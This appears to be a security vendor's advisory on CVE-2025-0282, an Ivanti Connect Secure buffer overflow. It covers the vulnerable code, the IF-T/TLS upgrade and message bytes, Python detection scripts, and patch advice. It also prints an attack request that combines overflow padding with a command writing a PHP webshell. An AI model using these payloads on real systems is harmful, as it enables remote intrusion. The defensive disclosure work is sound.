CVE-2025-0282 is a pre-authentication remote code execution (RCE) vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateway products, caused by a stack-based buffer overflow in the handling of IF-T/TLS protocol messages.
Ivanti fixed the vulnerability in Connect Secure 22.7R2.5; fixes for Policy Secure and ZTA Gateways followed in separate later releases. AIWAF continues to monitor related vulnerabilities.
1. Overview
Ivanti Connect Secure (SSL VPN), Policy Secure (network access control), and ZTA Gateways are affected by CVE-2025-0282, a stack-based buffer overflow that allows pre-authentication RCE. Ivanti disclosed the vulnerability in January 2025 after it had been exploited in the wild as a zero-day, and watchTowr Labs subsequently published a technical analysis of it.
Source : https://www.helpnetsecurity.com/2025/01/08/ivanti-exploited-connect-secure-zero-day-cve-2025-0282-cve-2025-0283/
2. Attack Type
CVE-2025-0282 is a pre-authentication RCE vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateway products. It is triggered by a buffer overflow in the handling of IF-T/TLS, the protocol these products use to talk to VPN clients (the open-source OpenConnect client implements the same protocol).
According to the watchTowr Labs analysis, the code that parses the client's connection parameters copies the clientCapabilities value into a 256-byte stack buffer with strncpy, but passes the length of the input string (strlen) as the bound instead of the size of the destination buffer. A clientCapabilities value longer than 256 bytes is therefore copied past the end of the buffer.
Decompiled code that watchTowr identified as vulnerable (comments added) :
...
char dest[256];                               /* fixed-size stack buffer */
clientCapabilities = getKey(req, "clientCapabilities");
if ( clientCapabilities != NULL )
{
    clientCapabilitiesLength = strlen(clientCapabilities);   /* attacker-controlled length */
    if ( clientCapabilitiesLength != 0 )
        connInfo->clientCapabilities = clientCapabilities;
}
memset(dest, 0, sizeof(dest));
/* BUG: the bound is the source length, not sizeof(dest), so a value
   longer than 256 bytes overflows dest. */
strncpy(dest, connInfo->clientCapabilities, clientCapabilitiesLength);
...
To reach this code, the attacker first sends an HTTP GET with an Upgrade: IF-T/TLS 1.0 header, which switches the connection from HTTP to IF-T/TLS, and then continues over the raw socket with messages framed according to the protocol specification.
HTTP request that upgrades the connection to IF-T/TLS :
GET / HTTP/1.1
Host: 10.0.0.206
User-Agent: BishopFox
Content-Type: EAP
Upgrade: IF-T/TLS 1.0
Content-Length: 0
IF-T/TLS messages sent over the upgraded socket afterward (each begins with a 16-byte big-endian header: vendor ID, message type, total message length including the header, and message identifier) :
\x00\x00U\x97\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x02\x02
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00t\x00\x00\x00\x01clientHostname=BishopFox clientIp=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x00
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00\x1b\x00\x00\x00\x02anonymous\n\x00
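As an added example (written for this page; not Ivanti, watchTowr or AIWAF code), the Python below encodes and decodes IF-T/TLS messages using the 16-byte header layout visible in the bytes above, rebuilds the three messages as a constructed sample, and flags a Juniper client-info message whose clientCapabilities value is longer than the 256-byte destination buffer. The constant names TYPE_VERSION_REQUEST and TYPE_CLIENT_INFO and the space-separated key=value layout of the client-info payload are assumptions drawn from the sample, not from a specification.

```python
"""Added example for this page: a minimal IF-T/TLS frame codec plus a check
for the CVE-2025-0282 trigger (clientCapabilities longer than 256 bytes).
Not Ivanti, watchTowr or AIWAF code. Sample frames are reconstructed from the
bytes shown in the text."""
from __future__ import annotations

import struct
from dataclasses import dataclass

# IF-T/TLS header: reserved byte + 24-bit vendor ID, message type,
# total length (header included), message identifier; all big-endian.
HEADER = struct.Struct(">IIII")
VENDOR_TCG = 0x5597       # bytes 00 00 55 97 in the first frame on the page
VENDOR_JUNIPER = 0x0A4C   # bytes 00 00 0a 4c ("\x00\x00\nL") in the others
TYPE_VERSION_REQUEST = 1  # assumed name for TCG type 1 seen on the page
TYPE_CLIENT_INFO = 0x88   # assumed name for Juniper type 0x88 seen on the page
DEST_BUFFER = 256         # char dest[256] in the decompiled code


@dataclass
class IftMessage:
    vendor: int
    msg_type: int
    ident: int
    payload: bytes


def encode(msg: IftMessage) -> bytes:
    """Serialize one message; the length field counts the header too."""
    total = HEADER.size + len(msg.payload)
    return HEADER.pack(msg.vendor, msg.msg_type, total, msg.ident) + msg.payload


def decode_stream(data: bytes) -> list[IftMessage]:
    """Split a byte stream into messages, rejecting truncated or bogus lengths."""
    msgs: list[IftMessage] = []
    off = 0
    while off < len(data):
        if len(data) - off < HEADER.size:
            raise ValueError(f"truncated header at offset {off}")
        vendor, msg_type, length, ident = HEADER.unpack_from(data, off)
        if length < HEADER.size or off + length > len(data):
            raise ValueError(f"bad length {length} at offset {off}")
        msgs.append(IftMessage(vendor, msg_type, ident, data[off + HEADER.size:off + length]))
        off += length
    return msgs


def parse_client_info(payload: bytes) -> dict[str, str]:
    """key=value pairs separated by spaces, terminated by newline and NUL
    (layout assumed from the sample on this page)."""
    fields: dict[str, str] = {}
    for token in payload.rstrip(b"\x00\n").split(b" "):
        key, sep, value = token.partition(b"=")
        if sep:
            fields[key.decode("latin-1")] = value.decode("latin-1")
    return fields


def overflow_alerts(data: bytes) -> list[str]:
    """One alert per Juniper client-info message whose clientCapabilities
    value is longer than the 256-byte destination buffer."""
    alerts = []
    for i, m in enumerate(decode_stream(data)):
        if m.vendor != VENDOR_JUNIPER or m.msg_type != TYPE_CLIENT_INFO:
            continue
        caps = parse_client_info(m.payload).get("clientCapabilities", "")
        if len(caps) > DEST_BUFFER:
            alerts.append(f"message {i}: clientCapabilities is {len(caps)} bytes (> {DEST_BUFFER})")
    return alerts


def page_frames() -> bytes:
    """The three messages shown above, rebuilt (constructed sample, not a capture)."""
    return b"".join(encode(m) for m in (
        IftMessage(VENDOR_TCG, TYPE_VERSION_REQUEST, 0, b"\x00\x01\x02\x02"),
        IftMessage(VENDOR_JUNIPER, TYPE_CLIENT_INFO, 1,
                   b"clientHostname=BishopFox clientIp=" + b"A" * 64 + b"\n\x00"),
        IftMessage(VENDOR_JUNIPER, TYPE_CLIENT_INFO, 2, b"anonymous\n\x00"),
    ))


def oversized_capabilities_frame(length: int = 300) -> bytes:
    """Detection test vector: the same client-info shape with an over-long
    clientCapabilities value (constructed; padding only, no exploit payload)."""
    payload = b"clientHostname=test clientCapabilities=" + b"A" * length + b"\n\x00"
    return encode(IftMessage(VENDOR_JUNIPER, TYPE_CLIENT_INFO, 1, payload))


if __name__ == "__main__":
    for m in decode_stream(page_frames()):
        print(f"vendor={m.vendor:#06x} type={m.msg_type:#x} id={m.ident} payload={m.payload[:40]!r}")
    print(overflow_alerts(page_frames()))  # []
    print(overflow_alerts(oversized_capabilities_frame()))
```

Running the script reproduces the header bytes shown above exactly (the length fields 0x14, 0x74 and 0x1b fall out of the header-plus-payload arithmetic), and only the constructed over-long frame produces an alert. A WAF or IDS that wants to cover the native IF-T/TLS path has to apply this kind of check after the HTTP Upgrade, because from that point the socket no longer carries HTTP.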
Also observed are attacks that bundle the overflow padding with a shell command that writes a PHP webshell, delivered in a single POST request.
POST request combining overflow padding with a webshell-writing command :
POST /dana-na/auth/url_default/welcome.cgi HTTP/1.1
Host: 10.0.0.206
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\xa3\x04\x08BBBB\x08\xb0\x04\x08echo \'<?php\n// Usage: http://target.com/shell.php?cmd=<command>\n\nif (isset($_GET[\'cmd\'])) {\n $cmd = $_GET[\'cmd\'];\n echo "<pre>" . shell_exec($cmd) . "</pre>";\n} else {\n echo "No command provided.";\n}\n?>\n\' > /shell.php'
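As an added example (written for this page; it is not AIWAF's "Webshell" pattern or any vendor's code), the Python below inspects a POST body for the two halves of the request above: a long run of padding bytes, and a command that writes PHP which calls a command-execution function on request input. The sample bodies are constructed to match the shape shown, not captured traffic; sample_attack_body, sample_benign_body and the indicator names are hypothetical.

```python
"""Added example for this page: a request-body inspector for the combined
overflow-plus-webshell POST shown above. Not AIWAF's pattern or vendor code;
the sample bodies are constructed, not captured."""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# One indicator per pattern so each finding says what matched.
FILL_RUN = re.compile(rb"(.)\1{199,}", re.S)      # 200+ identical bytes of padding
PHP_OPEN = re.compile(rb"<\?php", re.I)
EXEC_CALL = re.compile(rb"\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(", re.I)
SUPERGLOBAL = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
PHP_DROP = re.compile(rb">\s*/?[\w./-]*\.php\b")   # shell redirect into a .php file


def inspect_body(body: bytes) -> dict[str, str]:
    """Return {indicator: detail} for one request body (empty dict = nothing seen)."""
    raw = unquote_to_bytes(body)   # form bodies may percent-encode the payload
    findings: dict[str, str] = {}
    run = max(FILL_RUN.finditer(raw), key=lambda m: len(m.group(0)), default=None)
    if run:
        findings["padding"] = f"{len(run.group(0))} x {run.group(1)!r} at offset {run.start()}"
    call = EXEC_CALL.search(raw)
    if PHP_OPEN.search(raw) and call:
        findings["php_exec"] = call.group(1).decode("latin-1")
    if SUPERGLOBAL.search(raw):
        findings["php_input"] = "command taken from a request parameter"
    drop = PHP_DROP.search(raw)
    if drop:
        findings["php_drop"] = drop.group(0).decode("latin-1", "replace").strip()
    return findings


def verdict(body: bytes) -> str:
    """Block on a webshell drop, on overflow padding, or on embedded PHP exec."""
    f = inspect_body(body)
    if "php_exec" in f and "php_drop" in f:
        return "block: webshell drop"
    if "padding" in f:
        return "block: overflow padding"
    if "php_exec" in f:
        return "block: php command execution"
    return "allow"


def sample_attack_body() -> bytes:
    """Constructed to match the shape of the POST above: padding, then a
    command that writes a parameterised PHP shell (not a real capture)."""
    php = (b"<?php\nif (isset($_GET['cmd'])) {\n"
           b"  echo \"<pre>\" . shell_exec($_GET['cmd']) . \"</pre>\";\n}\n?>\n")
    return b"A" * 600 + b"BBBB" + b"echo '" + php + b"' > /shell.php"


def sample_benign_body() -> bytes:
    """Constructed ordinary login form body."""
    return b"username=alice&password=s3cret%21&realm=Users"


if __name__ == "__main__":
    for name, body in (("attack", sample_attack_body()), ("benign", sample_benign_body())):
        print(name, verdict(body), inspect_body(body))
```

The inspector decodes percent-encoding before matching, so the same PHP hidden in a urlencoded parameter is caught as well as the raw form above. Requiring both the exec call and the .php redirect for the "webshell drop" verdict keeps a lone `system(` in a legitimate code-paste from tripping it, while the padding rule catches the overflow half of the request on its own.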
3. Response
Ivanti has released Connect Secure 22.7R2.5, which fixes CVE-2025-0282; Connect Secure deployments should be updated to that version or later. Policy Secure and ZTA Gateways had not yet received patches at the time of writing, so those deployments should follow Ivanti's guidance and, in particular, must not be exposed to the Internet until a fix is applied.
For this vulnerability, attacks delivered natively over IF-T/TLS do not appear to be covered by an AIWAF pattern, because after the HTTP Upgrade the connection no longer carries HTTP. The variants that bundle a webshell in a POST request are mostly detected by the existing "Webshell" pattern.
4. Conclusion
Over the past year and into this year, numerous vulnerabilities have been reported in Ivanti products and solutions. Those that allow RCE without authentication, such as this one, are the most dangerous and require prompt updates to the latest versions.
For our AIWAF products, we have developed patterns that respond to vulnerabilities in Ivanti Connect Secure, Policy Secure, and ZTA Gateways, and we will continue to respond quickly to related vulnerabilities as they are discovered.
5. References
- https://labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/
- https://github.com/sfewer-r7/CVE-2025-0282
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
- https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit